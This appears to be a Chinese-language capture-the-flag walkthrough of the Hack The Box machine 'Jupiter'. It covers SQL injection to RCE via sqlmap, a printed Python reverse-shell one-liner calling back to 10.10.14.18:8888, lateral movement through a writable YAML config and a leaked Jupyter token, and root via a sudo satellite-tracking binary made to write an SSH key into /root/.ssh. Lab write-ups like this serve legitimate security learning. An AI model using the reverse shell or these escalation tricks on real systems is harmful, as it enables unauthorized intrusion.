Jupiter
Jupiter 是一台中等难度的 Linux 机器,它有一个使用 PostgreSQL 数据库的 Grafana 实例,该数据库在权限上过度扩展,容易受到 SQL 注入的影响,因此容易受到远程代码执行的影响。一旦站稳脚跟,就会注意到一个名为 Shadow 的实用程序,这是一种科学实验工具,可以简化对真实网络应用程序的评估,但其配置文件的权限配置错误。然后,通过查看与 Jupyter Notebook 关联的日志文件来实现横向移动,这些日志文件包含次要用户的令牌。获得对此用户的访问权限后,可以通过滥用卫星跟踪系统二进制文件来实现权限提升,该二进制文件可能由次要用户使用“sudo”权限执行。
外部信息搜集
端口扫描
循例nmap
Web枚举
访问80跳转到了jupiter.htb,加入/etc/hosts
vhost扫描
ffuf扫出一个vhost
kiosk子域
SQL注入
我在查看bp日志的时候发现了这个包,里面包含了非常显眼的sql查询语句
把请求给到repeater,使用version()查询一下,发现执行成功
接下啦就不再需要脑子了,我们可以通过sqlmap一键尝试RCE
正如所料,是DBA
来个常规python3 reverse shell payload
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' &
payload最后的&不能少,否则shell可能会被杀死
getshell
本地横向移动 -> juno
传个pspy
2023/12/22 07:24:01 CMD: UID=1000 PID=2159 |
2023/12/22 07:24:01 CMD: UID=1000 PID=2160 | rm -rf /dev/shm/shadow.data
2023/12/22 07:24:01 CMD: UID=1000 PID=2161 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
2023/12/22 07:24:01 CMD: UID=1000 PID=2164 | sh -c lscpu --online --parse=CPU,CORE,SOCKET,NODE
2023/12/22 07:24:01 CMD: UID=1000 PID=2165 | lscpu --online --parse=CPU,CORE,SOCKET,NODE
2023/12/22 07:24:01 CMD: UID=1000 PID=2170 |
2023/12/22 07:24:02 CMD: UID=1000 PID=2171 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
2023/12/22 07:24:02 CMD: UID=1000 PID=2173 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
2023/12/22 07:24:02 CMD: UID=1000 PID=2175 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
我们可以看到/home/juno/.local/bin/shadow这个应用似乎正将yml文件名作为输入并运行
这个文件我们有权读写
当我查看该文件时,接下来要做的事情便不再需要解释了
python3 payload
发现它确实执行了,但似乎执行没成功,反正我没get到shell
换种方法,直接写入ssh key
这次也执行了
登一下ssh看看有没有成功
本地横向移动 -> jovian
我看到当前用户具有另一个组,下意识查看那个组是否具有某些文件或目录
当我查看其中一个日志文件后,我发现本地8888端口的http服务应该就是jupyter
ssh做个端口转发
通过日志文件里的正确token,我们能够登录进去
进入这个文件
在这里我们能够运行python代码
直接来个python shellcode
nc
本地权限提升
sudo -l
通过strace发现它会读取/tmp/config.json,但由于不清楚它的配置究竟是怎么样的,所以即使我们自己创建了文件也没有意义
find
在那个目录下有我们想要的config.json
{
"tleroot": "/tmp/tle/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"http://celestrak.org/NORAD/elements/weather.txt",
"http://celestrak.org/NORAD/elements/noaa.txt",
"http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
将config.json复制到/tmp
运行看看效果
主要关注这句话
tleroot does not exist, creating it: /tmp/tle/
我们可以将tleroot改到/root/.ssh,然后它就会去请求tlesources的文件复制到tleroot,我们可以指定ssh public key
编辑/tmp/config.json
再次执行
ssh登root
root flag 还在老地方
